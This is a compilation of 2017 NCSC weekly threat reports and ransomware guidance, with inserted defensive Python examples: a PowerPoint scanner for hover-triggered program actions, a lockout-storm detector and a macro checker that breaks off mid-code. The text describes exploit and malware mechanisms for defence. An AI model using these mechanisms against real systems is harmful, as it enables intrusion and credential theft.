NCSC - WEEKLY THREAT REPORT 21ST JULY 2017

New SMB protocol exploit effective against most Windows operating systems

An EternalSynergy-based exploit has now been developed which can compromise newer (unpatched) versions of Windows. The original ETERNALSYNERGY exploit released by The Shadow Brokers in April exploited an SMB protocol vulnerability, CVE-2017-0143, to allow attackers to inject code onto Windows machines, but only worked on versions up to Windows 8.

A security researcher has now modified and upgraded ETERNALSYNERGY to be able to compromise all supported but unpatched Windows operating systems except for Windows 10. This new exploit code is publicly available to download on GitHub and ExploitDB.

This case shows that exploits previously thought to only be effective against older or unsupported operating systems such as Windows XP can be modified to compromise newer and currently supported systems. This illustrates the importance of rigorous vulnerability management and patching, including patching newer operating systems.

Rise in cyber crime as a service

A new credential-stealing malware, named Ovidiy Stealer, is being sold on cyber crime forums for as little as £6. The low price reflects its limited capabilities. It is non-persistent, so can be removed by simply rebooting an infected computer, but it is reportedly easy to use and capable of harvesting usernames and passwords for a number of common applications. Ovidiy Stealer has compromised targets around the world, including in the UK.

Similarly, a new Phishing-as-a-Service platform, 'HackShit', has been marketing itself to would-be fraudsters. For a monthly subscription, users can generate plausible looking login pages which imitate popular social media and dating sites. The subscribers can also use the platform to trade compromised accounts for cryptocurrency, and to view tutorials on hacking and phishing.

The increasingly low barriers to entry for cyber crime are of concern because individuals with limited technical knowledge can now purchase basic cyber capabilities for a modest sum.

NCSC - Weekly Threat Report 14th July 2017

China to ban personal VPNs

The Chinese government has told state-owned telecoms companies to block individuals’ access to virtual private networks (VPNs) by 1 February 2018, according to media reports. The ban will greatly restrict individuals’ unfettered access to the Internet. VPNs have often been used to circumvent China’s Great Firewall and communicate securely with servers outside of China. The Chinese government has increasingly cracked down on them in pursuit of “Internet sovereignty”, or controlling online activity within China’s borders.

The ban on individual access to VPNs follows new rules introduced in June 2017 requiring companies wishing to use VPNs to apply to the government for permission. They also face strict rules on data transfers. Many foreign businesses have expressed concern at the implications for privacy, data protection and the security of their intellectual property. Possible workarounds may exist for technically proficient individuals, but average Internet users face being cut off from the free and open Internet.

Sources: Bloomberg News, “China Tells Carriers to Block Access to Personal VPNs by February” (10 July 2017); Washington Post, “Here’s China’s latest plan to keep its citizens from the open Internet” (10 July 2017)

Communications take quantum leap forward in China?

China’s ongoing project to develop an ‘unhackable’ quantum communications (QC) network, where communications cannot be intercepted without being detected, continues to move forward. The country is developing the world’s longest land-based QC network stretching 2,000 km between Beijing and Shanghai. It is being developed in the eastern city of Jinan, where a trial network of 200 terminals will enter service in August 2017. China intends to use it to enable ultra-secure communications for the government, military and commercial banks.

China has also reportedly demonstrated the first ground-to-orbit quantum teleportation (QT) using an experimental satellite. The test was conducted by “entangling” two photons, one on the ground and the other on the satellite, then using quantum physics to transmit information from one to the other at a distance of 500 km. While QT has previously been conducted through fibre-optic cables, a successful trial in space offers the prospect of ultra-secure wireless data communications. China’s claim has yet to be verified by other scientists.

NCSC - Weekly threat report 7th July 2017

Scams follow widely reported attempt to compromise parliamentary email accounts

Following reported attempts by hackers to compromise parliamentary email accounts in June, scammers have recently attempted to gain information by cold-calling (or vishing) MPs and their staff. Posing as staff from the Houses of Parliament’s IT department, the scammers have reportedly been requesting the usernames and passwords of MPs. Vishing, like its online equivalent, phishing, attempts to elicit sensitive information, such as passwords, or to encourage victims to visit particular (invariably malicious) websites.

Scammers try to capitalise on heightened public awareness of particular issues. Such social engineering techniques often increase in prevalence following a high-profile incident. For example, following the WannaCry ransomware incident, there were several reported scams, including fake fixes for the malware and malicious ‘tech support’ services. Phone calls can form part of a blended social engineering campaign, along with emails or social media contact. It is likely that scams such as these will continue to follow widely reported events.

NCSC - Weekly Threat Report 30th June 2017

Password challenges

Passwords have been in the news again recently. Most notably, on Friday 23 June accounts with weak passwords on the UK Parliamentary network were compromised; however, fewer than 1% of the system’s 9,000 accounts were directly affected. Attention was also drawn this week to router password vulnerabilities, as Virgin Media advised customers with Virgin Super Hub 2 home routers to reset their passwords. This followed concerns that the routers had a relatively weak eight-character default password consisting of lower case letters that could be cracked in four days, potentially allowing access to other home devices. Routers supplied by other service providers may also come with default passwords.

Passwords also featured in Ciaran Martin’s interview with BBC’s Today programme (Friday 30 June, 0810) where he recommended that two-factor authentication be used so that a stolen password is much less valuable to a criminal.

A portion of Microsoft Windows 10 source code leaked online

Microsoft has confirmed that a portion of its source code has been leaked online. The initial source of the leak is unknown; however, the content was posted to Beta Archive, one of the largest online ‘Beta and Abandonware’ repositories for prototype software. The leaked content was 1.2GB in size and has since been removed from the Beta Archive site.

Microsoft already shares some of its source code with industry partners and government through its Shared Source Initiative. However, this instance represents an unauthorised leak. A number of theories about who is responsible are currently circulating. Was it one of Microsoft’s trusted partners who already had access to the source code? Or was it a criminal who illegitimately obtained access to the code before leaking it? There is no evidence to confirm either way at this stage. The leak occurred one day after two men were arrested in the UK for unauthorised access to Microsoft’s network; however, there is no evidence that these two incidents are related.

Some reports have highlighted the risks of malicious actors using the leak to identify vulnerabilities in the code before developing exploits to target them. However, when a similar leak of Microsoft’s Windows 2000 code occurred in 2004, similar claims were made but did not result in a significant uptick in related attacks. Also, white hat hackers may use the leaked code as an opportunity to investigate it for vulnerabilities before reporting them to Microsoft for fixing.

While Microsoft has responded to this incident, questions have been raised about how the source code was originally obtained.

Disgruntled ex-employee conducts Smart Meter Network attack

A former radio frequency engineer used information about systems he had worked on to disable meter reading equipment at several US water utility companies. The individual has since been convicted of two counts of "unauthorized access to a protected computer and thereby recklessly causing damage” and has been sentenced to 12 months in prison.

This case demonstrates the importance of revoking software access when dismissing staff, and of appropriate access management generally. The software used by the former employee remained on his home computer following termination, and he also retained access to default root passwords. Using these, he took advantage of his pre-existing network and systems access to cause disruption (including changing the password to an obscenity and the code of a computer script to the lyrics of a Pink Floyd song), reportedly out of frustration rather than malicious, destructive intent.

Critically this was not a sophisticated cyber attack; the perpetrator knew enough about the system to effectively disrupt it with limited cyber capabilities. Appropriate access management is important not only for employees leaving organisations, but also those moving into different departments where their access requirements may change. Lax access management often enables insiders to have greater, more targeted impact against their organisations.

Cyber crime trends and statistics in 2016

The FBI has recently published its annual internet crime report. The trending topics for 2016 were Business Email Compromise (BEC), ransomware, technical support fraud and extortion.

A total of 298,728 complaints were received, with reported losses in excess of $1.3 billion. The FBI estimates that only 15 percent of fraud victims in the US report their crimes to law enforcement.

The UK's National Crime Agency (NCA) considers underreporting a huge barrier to understanding the true scale and cost of cyber crime. The reasons for underreporting include reputational damage; not knowing who to report the crime to; what constitutes a cyber crime; and being unaware that a crime has taken place.

Although figures in the FBI report are not directly comparable with UK statistics, they do indicate similarities in overall trends, such as the increase in ransomware crimes, BEC and technical support fraud.

NCA has recently published a report highlighting these cyber crime trends as well as an increase in the prevalence of mobile malware. NCA has also highlighted the Internet of Things (IoT) threat as having become more mature in 2016.

The UK has also seen an increase in technical support fraud, and British law enforcement and Microsoft have been working together for two years investigating these scams. Criminals will typically trick victims into believing their computers have been infected with malware and then persuade the victim to pay for the problem to be fixed. Sometimes the scam involves a pop-up message appearing on a computer claiming to be "Microsoft Technical Support". As a result of the investigation, four UK citizens have recently been arrested.

The NCSC has guidance for businesses on understanding the cyber crime model, and for members of the public on how to protect against cyber crime and what to do if you think you have been the victim of a cyber crime.

Ransomware tool causes widespread disruption

On Tuesday 27 June, widespread disruption was caused in Ukraine by a ransomware tool that spread to other organisations worldwide via trusted networks. The ransomware tool, with similarities to the Petya ransomware that first struck in early 2016, was inserted into a compulsory software update for Ukrainian financial and government institutions.

Once the malware was installed it looked for other systems to exploit using some of the same worm-like capabilities seen in the WannaCry attacks. In addition, infected devices were subjected to a memory and file system scrape to steal credentials, which allowed the malware to move laterally through a network even if it was patched against the exploits used. This highly crafted tool was designed to spread rapidly, in some cases overwriting the Master Boot Record (MBR) on infected computers and displaying a ransom note asking for payment in Bitcoin. Despite the request for Bitcoin, it should be noted that the malware does not store a decryption key, and as such the attackers could not restore a victim’s files following payment; there have been no reported successful decryptions following payment.

The NCSC announced on Thursday 29 June that while managing the impact to the UK, its experts had found evidence that questioned initial judgements that the intention of this malware was to collect a ransom. The NCSC is investigating with the NCA and industry whether the intent was to disrupt rather than for any financial gain.

The malware has spread to a number of organisations worldwide that do business with Ukraine, including Russia’s oil firm Rosneft, Danish shipping concern Maersk and a large UK advertising agency.

Whilst this latest ransomware infection is more limited in scale than WannaCry, it is assessed that the success of these two incidents is likely to motivate other actors who aim to cause widespread disruption to employ “ransomware” to do so.

NCSC - Weekly Threat Report 23rd June 2017

This report is drawn from recent open source reporting.

Fake airline websites distributed by social media

Scammers are using the brands of major global airlines to lure users to fake websites and then encourage them to share links to the sites with friends. When a user clicks through to the sites they are prompted to answer a few simple questions and provide personal information to get free flights. Once they give away their name, email, phone, date of birth and address they are then told they will receive the flights, only once they ‘like’ and share the page on Facebook, spreading the fake sites to new victims.

According to threat researchers, cyber criminals were observed registering 95 fake websites in late March using the brands of 19 major airlines, including ones based in the UK. The personal details provided by the victims are used for fraudulent marketing purposes, namely to drive traffic to websites that provide online promotions and monetisation of web and mobile applications. Fraudsters, like marketing managers, often leverage an effective freebie strategy (gifts, prize draws etc.) to attract public attention.

In the run-up to the summer holidays, this cyber-enabled fraud may lead to lost custom and reputational damage for the airlines. The use of social media to distribute fake websites is likely to continue to increase. It is not limited to airlines and could affect any well-known brand. There also remains a risk that malicious actors could modify the scheme and use such sites to distribute malware to victims. For guidance see the NCSC’s 10 Steps: Malware Prevention.

NCSC - Weekly Threat Report 16th June 2017

Mouseover malware masquerading in PowerPoint files

According to media reports, a new method of delivering malware has surfaced. 'Zusy' malware, according to IT company ExtremeTech, is a banking trojan whose intention is to steal credentials. The reports suggest that simply hovering your mouse over a link will lead to infection without requiring you to click on anything. However, several stages are required to successfully infect a user.

What is interesting about this malware is that the initial infection vector does not rely on Macros or JavaScript to execute its malicious code. Instead, the malware developer has focused on abusing certain features in Microsoft PowerPoint to download and deploy the banking trojan.

This malware is initially delivered to users through phishing as an email attachment. First, the user needs to click on and open an attachment which displays a PowerPoint slide in slide show mode. A segment of text or a picture on the PowerPoint slide will have a clickable hyperlink. The most common message seen at this time is 'Loading...Please wait'. The 'mouseover' malware will only initiate if the user directs their cursor over the text or picture. A command is then executed which attempts to run an external program such as a PowerShell script. At this point Microsoft's security feature, Protected View, which is enabled by default, will display a warning notice allowing the user to disable the program. If the program is not disabled, it will create a backdoor giving the attacker full access to the victim machine. Users running PowerPoint versions older than 2010 are particularly vulnerable to this type of attack because when they hover over the link the preview window will open automatically without giving them the option to disable the malicious program.

Historically, malware infections have occurred when the victim clicks on a suspicious link, and general guidance has always advised users to hover over links to check file formats for suspicious executables. Users should continue to remain aware and be vigilant when receiving email attachments.

Although this development is not as alarming as it may first appear, the NCSC assesses that we may see a more sophisticated version of this attack vector in the future. The NCSC recommends that users follow NCSC malware guidance which includes regularly updating antivirus software to reduce the risk of being infected.

Enterprises that implement application whitelisting approaches, as described in the NCSC Windows EUD Security Guidance, will also mitigate current variants of this threat by preventing the malicious scripts and programs downloaded by the malware from running.
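The hover-triggered "run program" behaviour described above corresponds, in the Office Open XML that a .pptx is made of, to a hyperlink element (hlinkMouseOver for hover, hlinkClick for click) whose action attribute is ppaction://program, with the command itself held in the slide's relationships part. The following added example (not code from the NCSC report) builds a constructed .pptx in memory and scans every slide for such actions; the element and attribute names come from the OOXML specification, while the placement of the command in the relationship Target is an assumption.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

A_NS = "http://schemas.openxmlformats.org/drawingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"

# DrawingML hyperlink elements: one fires on click, the other on mouse hover.
LINK_TAGS = {f"{{{A_NS}}}hlinkClick": "click", f"{{{A_NS}}}hlinkMouseOver": "mouseover"}
# The "Run program" action; a link carrying it launches an external command.
PROGRAM_ACTION = "ppaction://program"

def _load_rels(zf, slide_name):
    """Map relationship ids to targets for one slide (empty if it has no rels part)."""
    rels_name = re.sub(r"slides/(slide\d+\.xml)$", r"slides/_rels/\1.rels", slide_name)
    if rels_name not in zf.namelist():
        return {}
    root = ET.fromstring(zf.read(rels_name))
    return {rel.get("Id"): rel.get("Target") for rel in root.iter(f"{{{RELS_NS}}}Relationship")}

def find_program_actions(pptx_bytes):
    """Return [(slide part, trigger, command)] for every link that runs an external program."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(pptx_bytes)) as zf:
        for name in sorted(zf.namelist()):
            if not re.fullmatch(r"ppt/slides/slide\d+\.xml", name):
                continue
            rels = _load_rels(zf, name)
            for elem in ET.fromstring(zf.read(name)).iter():
                if elem.tag not in LINK_TAGS:
                    continue
                if not elem.get("action", "").lower().startswith(PROGRAM_ACTION):
                    continue
                rid = elem.get(f"{{{R_NS}}}id")
                findings.append((name, LINK_TAGS[elem.tag], rels.get(rid, "<unresolved>")))
    return findings

# Constructed sample slide: hovering the "Loading...Please wait" text runs a program.
SLIDE_XML = f"""<?xml version="1.0" encoding="UTF-8"?>
<p:sld xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"
       xmlns:a="{A_NS}" xmlns:r="{R_NS}">
  <p:cSld><p:spTree><p:sp><p:txBody><a:p><a:r>
    <a:rPr><a:hlinkMouseOver r:id="rId2" action="ppaction://program"/></a:rPr>
    <a:t>Loading...Please wait</a:t>
  </a:r></a:p></p:txBody></p:sp></p:spTree></p:cSld>
</p:sld>"""

# Constructed relationships part; the command line is an obvious placeholder (assumed layout).
RELS_XML = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="{R_NS}/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>
  <Relationship Id="rId2" Type="{R_NS}/hyperlink" Target="CONSTRUCTED_SAMPLE_COMMAND" TargetMode="External"/>
</Relationships>"""

# Constructed benign slide: an ordinary click hyperlink with no program action.
CLEAN_SLIDE_XML = f"""<?xml version="1.0" encoding="UTF-8"?>
<p:sld xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"
       xmlns:a="{A_NS}" xmlns:r="{R_NS}">
  <p:cSld><p:spTree><p:sp><p:txBody><a:p><a:r>
    <a:rPr><a:hlinkClick r:id="rId2"/></a:rPr><a:t>Agenda</a:t>
  </a:r></a:p></p:txBody></p:sp></p:spTree></p:cSld>
</p:sld>"""

def build_constructed_sample():
    """Assemble a minimal two-slide .pptx (a zip container) from the constructed parts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("ppt/slides/slide1.xml", SLIDE_XML)
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", RELS_XML)
        zf.writestr("ppt/slides/slide2.xml", CLEAN_SLIDE_XML)
    return buf.getvalue()

if __name__ == "__main__":
    for slide, trigger, command in find_program_actions(build_constructed_sample()):
        print(f"{slide}: '{trigger}' link runs external program: {command}")
```

To scan a real attachment, pass the file's bytes to find_program_actions; an empty list means no slide carries a run-program link.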

Industrial Control Systems malware (Industroyer/CrashOverride)

The NCSC is aware of open source reporting providing details of malware dubbed as 'Industroyer' or 'CrashOverride', which is reported to be connected with the December 2016 power outages in Ukraine.

Previous media reporting suggests that during this incident, cyber attackers compromised parts of the Ukrainian electricity transmission network, resulting in the loss of electricity supply to customers for approximately one hour.

The NCSC has published on CiSP details of mitigation strategies to secure networks against these attacks. US-CERT has also published analysis and indicators of compromise.

NCSC - Weekly Threat Report 9th June 2017

Fireball malware

More than 250 million computers worldwide have been infected with malicious adware called Fireball, according to recent reporting. Produced by Rafotec, a Beijing-based digital marketing firm, the malware is spread mostly via bundling. That is, when a user downloads a product they want, the Fireball malware is ‘bundled’ in without the user’s knowledge or consent.

Once infected, Fireball hijacks the user’s browser, installs extra plug-ins and manipulates the user’s web traffic. By redirecting traffic to Rafotec’s fake search engines, Fireball is able to generate additional advertising revenue for the company. A greater concern is the fact that Fireball can, in theory, be repurposed to serve as a fully functioning malware downloader.

Should Fireball be repurposed for further malicious activity it could be used to harvest sensitive data, such as financial credentials, medical records, or corporate business plans for example. Whilst estimates are that Indonesia, India and Brazil have the highest infection rates at present, other countries have been impacted.

In line with NCSC guidance, make sure you only install software from trusted sources.

Single Sign-On provider OneLogin is compromised

In late May, OneLogin, an online access and identity manager, experienced a security breach in which sensitive customer data in its US region may have been compromised. OneLogin primarily provides Single Sign-On (SSO) and identity management services for corporate customers using cloud-based applications. It is not yet clear how the unauthorised access happened, nor its impact, but it is suspected that a threat actor obtained access to Amazon Web Services (AWS) keys and used them to gain access to the AWS Application Programming Interface (API) via another, smaller provider in the US. The actor was then able to access database tables containing information about users, apps and various types of keys. This may have included the ability to decrypt encrypted customer data.

To minimise damage OneLogin issued advice to customers which included generating new keys, authorisation tokens, security certificates and credentials and updating passwords.

This is not the first time an SSO or similar service has been targeted. Although, like password managers, they are increasingly considered to be a better way of managing access, they are a tempting target for attackers, and the consequences of compromise can be severe.

A new variant of Qakbot malware is bringing down enterprise networks

A new variant of the Qakbot (aka Qbot or PinkSlip) trojan, first seen in 2009, is stealing user information and installing backdoors on Microsoft Windows operating systems. Qakbot malware is used to target online bank accounts of businesses and individuals. Victims are initially infected through an exploit kit, phishing campaign or malicious download.

This new variant has worm-like, self-replicating capabilities similar to WannaCry but it is not ransomware and does not encrypt user hard drives. In its attempts to steal or brute force login details it can cause mass Active Directory lockouts. Some organisations have had thousands of users prevented from using corporate systems as a result.

According to researchers, the Qakbot code has been totally re-written and is even more advanced and effective. The new features make it difficult to detect, through the use of obfuscated code and constantly evolving file structure and signatures.

We assess it likely that other malware campaigns will make use of these antivirus-avoiding techniques. Users should stay on their guard against suspicious emails and activity and keep their systems up to date to help prevent infection.
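The mass Active Directory lockouts described above leave a trail in the domain controllers' Security log: each lockout is an Event ID 4740 record naming the locked account and the caller computer it was triggered from, so many distinct accounts locked from one caller in a short window is a usable signal for the brute-forcing behaviour. This added example (not from the NCSC report) runs that detection over a constructed, flattened log export; real 4740 events are XML in Event Viewer, and the one-line format, threshold and window here are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: a flattened export of Security log events, one per line as
# "<timestamp> <EventID> <TargetUserName> <CallerComputerName>" (assumed format).
SAMPLE_LOG = """\
2017-06-05T08:00:01 4740 alice WS-0412
2017-06-05T08:00:03 4740 bob WS-0412
2017-06-05T08:00:04 4740 carol WS-0412
2017-06-05T08:00:06 4740 dave WS-0412
2017-06-05T08:00:09 4740 erin WS-0412
2017-06-05T08:15:00 4740 frank WS-0201
2017-06-05T09:40:00 4740 grace WS-0412
2017-06-05T09:41:00 4625 henry WS-0201
"""

def parse_lockouts(text):
    """Parse the flattened log, keeping only 4740 (account locked out) events."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[1] != "4740":
            continue  # skip malformed lines and other event types (e.g. 4625 logon failures)
        when, _, account, caller = parts
        events.append((datetime.fromisoformat(when), account.lower(), caller))
    return events

def find_lockout_storms(events, min_accounts=5, window=timedelta(minutes=10)):
    """Return {caller: peak} for every caller computer that locked out at least
    min_accounts distinct accounts within any window-long interval; peak is the
    largest number of distinct accounts seen in one such interval."""
    by_caller = defaultdict(list)
    for when, account, caller in events:
        by_caller[caller].append((when, account))
    storms = {}
    for caller, items in by_caller.items():
        items.sort()  # chronological, so each window is a contiguous slice
        peak = 0
        for i, (start, _) in enumerate(items):
            seen = {acct for when, acct in items[i:] if when - start < window}
            peak = max(peak, len(seen))
        if peak >= min_accounts:
            storms[caller] = peak
    return storms

if __name__ == "__main__":
    for caller, peak in find_lockout_storms(parse_lockouts(SAMPLE_LOG)).items():
        print(f"possible lockout storm from {caller}: {peak} accounts locked within 10 minutes")
```

Isolating the flagged caller computer, rather than only unlocking accounts, stops the lockouts recurring while the host is investigated.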

Vulnerabilities

This week’s summary starts with Google and multiple flaws fixed in both Chrome and Android leading to URL spoofing, obtaining of sensitive information and remote code execution.

Cisco released updates for a number of different products (TelePresence, AnyConnect, Email Security Appliance, Prime Data Center Network Manager, NX-OS, Content Security Management Appliance, and 8800 Series IP phones) to address cross-site scripting and bugs that cause the target to crash, allow unauthorised access or permit remote code execution.

IBM released updates for their Security Access Manager Appliance, Spectrum Protect (IBM Tivoli Storage Manager) and Domino TLS Server to prevent elevation of privilege, viewing of passwords, obtaining of sensitive information, and obtaining of authentication credentials.

Elsewhere this week there were updates for Wireshark, Apache Tomcat, VMware vSphere and Irssi.

Debian specific updates this week came from perl, nss and zookeeper.

ICS specific updates were released for Digital Canal Structural Wind Analysis and Rockwell Automation PanelView.

NCSC - Weekly Threat Report 2nd June 2017

Android app malware

According to IT security company Check Point, as many as 36 million Android devices may have been infected with ad-click malware. The malware, dubbed Judy, is reported to have been present in approximately 50 apps in Google’s Play Store, but the total number of infections cannot be accurately determined as it is not known for how long the apps have been malicious.

Those responsible generate money through ad-clicks – in this instance Judy silently imitated a browser and clicked on banners from Google’s ad infrastructure to generate revenue for the malware author. The malware has had little real impact upon the end user, though it does equate to an illegitimate use of a device, and could potentially be exploited for more sophisticated attacks, including: gaining control of devices for additional malware download, conducting DDoS attacks or gaining access to private networks.

Google’s protection system did not immediately identify the problem because the apps themselves did not contain any malicious code. Rather, once downloaded from the Play Store, the affected apps are designed to call out to a remote server which then delivers malicious ad-click software to devices.

This type of two-stage delivery is increasingly common. Last month, FalseGuide malware was discovered hidden inside apps and games on the Play Store. Following download, these compromised apps allow malicious actors to install additional malicious software. App stores may come under increased pressure to enhance their scrutiny of apps before permitting them to feature, particularly if the number of adware infections increases.

The NCSC recommends that users only install apps from the official application store for their device. Malicious apps in official stores are more likely to be discovered, and subsequently removed from the store and the device.

RoughTed Malvertising Campaign

Threat researchers at internet security firm Malwarebytes have recently highlighted a significant malvertising campaign, called RoughTed, which has been running for over a year.

Malvertising (or ‘malicious advertising’) uses online advertising as a delivery method for malware. Malware-infected ads can be inserted into popular, legitimate websites, and often do not require user action to be effective: simply visiting an infected site can be enough to get infected.

Criminal use of malvertising as a vector for malware delivery has been an increasing trend since it was first observed in approximately 2007 with the exploitation of a vulnerability in Adobe Flash. In 2015 Google disabled more than 780 million ads that violated their policies, some of which carried malware, up from 524 million in 2014.

RoughTed is notable for its prolific distribution, with associated domains accumulating in excess of half a billion visits in a three-month period. According to researchers, traffic diverted to RoughTed-related domains comes from thousands of different websites, some of which are ranked in the Alexa top 500 websites. RoughTed can reportedly target a wide array of users according to their operating system, browser and geolocation before delivering a variety of payloads, including exploit kits and malware. Moreover, RoughTed has been circumventing adblockers, broadening the pool of potential victims.

NCSC - Weekly Threat Report 26th May 2017

This report is drawn from recent open source reporting.

Russian government reaction to cyber criminals

This week Russia revealed it had arrested a cyber crime gang in November last year for a campaign that raised nearly USD 900,000. The gang was nicknamed ‘Cron’ after the malware it used, which infected over a million Android mobile devices of Russian bank customers. Users unwittingly downloaded the malware via fake mobile banking apps, pornography and e-commerce programmes. The ‘Cron’ gang exploited a Russian bank service which allows users to move small amounts of money to other accounts by sending an SMS message. The criminals sent SMS messages from infected devices instructing banks to transfer funds to their own accounts. According to Group-IB, the Russian cyber security company that worked with Russian law enforcement on the investigation, the ‘Cron’ gang were planning to rent a further piece of malware adapted to target banks in France, Germany, the UK and the US, amongst other unnamed countries.

Fake applications that impersonate a brand or organisation are not new. Purchasing from legitimate sources can reduce the risk of acquiring bogus applications.

Fake malware fixes

WannaCry ransomware may not have generated the wealth the scammers responsible were hoping for, but since the attack enterprising criminals have been attempting to cash in on the heightened public awareness of WannaCry. Targeting concerned users, scammers have been offering a range of fake ‘fixes’ and ‘support services’.

This type of social engineering is a common methodology for cybercriminals. Whether viral social media posts, malicious pop-ups or well-crafted phishing campaigns, high profile events such as the WannaCry attack offer cyber criminals a hook to spread malware or to solicit funds.

It’s not only online incidents that criminals seek to take advantage of. Following news of high profile disasters such as Hurricane Katrina in 2005, the 2014 Ebola outbreak and the 2015 Nepal earthquake, scammers set up fake charity websites and sent phishing emails in attempts to steal funds donated to the victims.

Recent examples of scams piggybacking on the WannaCry incident include:

  • Alerts circulating on social media directing users to fake WannaCry patches which deliver malware;
  • A phishing email posing as a BT customer service email which informs the user they are locked out of their BT account and directs them to a malicious link to obtain a ‘security upgrade’ to re-establish full access;
  • Third party app stores offering ‘patches’ for mobile users, despite the fact that no mobile operating systems are believed to be vulnerable to WannaCry.

The recent UK Action Fraud alert has more information on specific fraud attempts.

The NCSC guidance page has further information on how to protect against phishing attempts as well as our recent blog on social engineering.

Europol arrest 27 individuals involved in black box ATM attacks

An international law enforcement effort has resulted in the arrest of 27 individuals in connection with a string of successful black box attacks against ATMs across Europe. These attacks are thought to have generated up to EUR 0.5 million for the criminals responsible. Black box attacks are cyber-enabled and involve physically penetrating an ATM’s casing to obtain access to exposed cables and ports. A laptop can then be connected and used to issue instructions to the ATM to cash out its bank notes. These attacks are less sophisticated and more common than cyber-dependent attacks that deploy malware to ATMs remotely, over a financial institution’s network. For more information on the cyber threat to UK ATMs, please see our recent assessment on CiSP.

NCSC - Weekly Threat Report 19th May 2017

WannaCry ransomware attack illustrates risk of using unlicensed software

The WannaCry international ransomware attack has highlighted the risks of relying on unpatched software. The scale of the outbreak has been blamed in part on the widespread use of unlicensed software. Pirated software is often insecure as it does not benefit from manufacturers’ updates to fix vulnerabilities.

Several of the countries reported by cyber security companies to be worst affected are also amongst the countries where unlicensed software is most widely used.

This incident illustrates that while using unlicensed software might be seen as a way of saving money in the short term, it can put cyber security at serious risk and may potentially lead to losses far outweighing any savings.

The NCSC's guidance on protecting your organisation from ransomware can be found here. Further guidance for home users and small businesses as well as enterprise administrators is also available.

NCSC Guidance - Protecting your organisation from ransomware

Protecting your organisation from ransomware

Created:  17 Oct 2016

Updated:  17 Oct 2016

How to prevent a ransomware incident, and what to do if your organisation is infected.

Ransomware is a growing global cyber security threat, and one which could affect any organisation that does not have appropriate defences. The first half of 2016 saw an almost threefold increase in ransomware variants compared to the whole of 2015[1].  While ransomware against Windows operating systems has been commonplace for some years, attacks against Mac and Linux systems are also seen.

The methods for infecting systems with ransomware are similar to other types of malicious software, as are the steps organisations can take to protect themselves. Depending on your level of preparation, ransomware infection can cause minor irritation or wide-scale disruption.

This guidance provides an overview of ransomware, suggests some simple steps to prevent a ransomware incident, and advises on what to do if your organisation is infected by ransomware.

What is ransomware?

There are two types of ransomware: the first type encrypts the files on a computer or network; the second type locks a user's screen. Both types require users to make a payment (the 'ransom') to be able to use the computer normally again. The ransom is often demanded in a cryptocurrency such as Bitcoin.

In many cases, the ransom amount is quite modest. This is designed to make paying the ransom the quickest and cheapest way to return to normal use. However, there is no guarantee that the key or password (to 'unlock' the computer) will be provided upon payment of the ransom.

The scale and automated nature of a ransomware attack makes it profitable through economies of scale, rather than through extorting large amounts from targeted victims. In some cases, ransomware has been known to strike the same victim more than once in succession. Ransomware attacks are not normally targeted at specific individuals or systems, so infections can occur in any sector or organisation.

How does ransomware infect your system?

Computers are infected with ransomware via a number of routes. Sometimes users are tricked into running legitimate-looking programs which contain the ransomware. These may arrive via authentic-looking email attachments or links to apparently genuine websites (otherwise known as phishing). More recently, we have seen ransomware infections which rely on unpatched vulnerabilities in the browser or its plug-ins, where simply visiting a malicious or compromised website is enough to trigger the infection without any further action by the user.

Although less common, data transfers between computers (such as via USB memory sticks) can also cause ransomware to spread.

Preventing ransomware using good enterprise security

Ransomware is one of many types of malware, and the methods for its delivery are common to most other types. You can minimise the risk of being infected by ransomware by taking the same precautions necessary to guard against malware in general.

The following mitigations are examples of good security practice, and link to other NCSC guidance where available:

  • Vulnerability management and patching - some ransomware gains control by exploiting software vulnerabilities in operating systems, web browsers, browser plug-ins or applications. Often these vulnerabilities have been publicly known about for some time and the software providers will have made patches available to mitigate them. Deploying these patches, or otherwise mitigating the vulnerabilities, is the most effective way of preventing systems being compromised. However, as well as patching the devices used for web browsing and email, it's important to patch the systems they are connected to, since some ransomware is known to move around systems, encrypting files as it goes.
  • Controlling code execution - consider preventing unauthorised code delivered to end user devices from running.  One common way that attackers gain code execution on target devices is to trick users into running macros. You can prevent these attacks from being successful in your organisation by preventing all macros from executing - unless you have explicitly trusted them. It's also good practice to ensure users do not have privileges to install software on their devices without the authorisation of an administrator. Remember that users may sometimes legitimately need to run code that you have not pre-authorised; consider how you will enable them to do this, so that they are not tempted to do it secretly, in ways you can't see or risk-manage. See our End User Device security guidance for recommended configuration of the platforms you are running.
  • Filter web browsing traffic - we recommend using a security appliance or service to proxy your outgoing web browsing traffic. Filter attempted connections based on categorisation or reputation of the sites which your users are attempting to visit.
  • Control removable media access - see our advice on management of removable media to prevent ransomware from being brought in to an organisation via this channel.

For more information see Approaching enterprise technology with cyber security in mind.
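
As an added illustration of the 'controlling code execution' point above, and not part of the NCSC guidance itself, the following Python check inspects an incoming Office attachment for an embedded VBA project rather than trusting its extension, so a mail gateway or sandbox pre-filter can block or quarantine macro-bearing documents before a user is ever asked to enable them. It relies on two file-format facts: OOXML files are zip containers that store macros in a part named vbaProject.bin, and legacy .doc/.xls files are OLE2 compound files with a fixed magic number. The sample documents are constructed in memory, and the allow/block/sandbox policy and function names are the example's own.

```python
import io
import zipfile

# OOXML documents are zip containers; a VBA project, if present, is stored as a
# part named vbaProject.bin under word/, xl/ or ppt/ (the .xlsb format too).
VBA_PART_SUFFIX = "vbaproject.bin"

# Extensions Office itself reserves for macro-enabled files.
MACRO_ENABLED_EXT = {".docm", ".dotm", ".xlsm", ".xltm", ".xlsb", ".pptm", ".potm", ".ppam"}
OOXML_EXT = {".docx", ".dotx", ".xlsx", ".xltx", ".pptx", ".potx"} | MACRO_ENABLED_EXT

# Magic number of the legacy OLE2 compound file used by .doc/.xls/.ppt.
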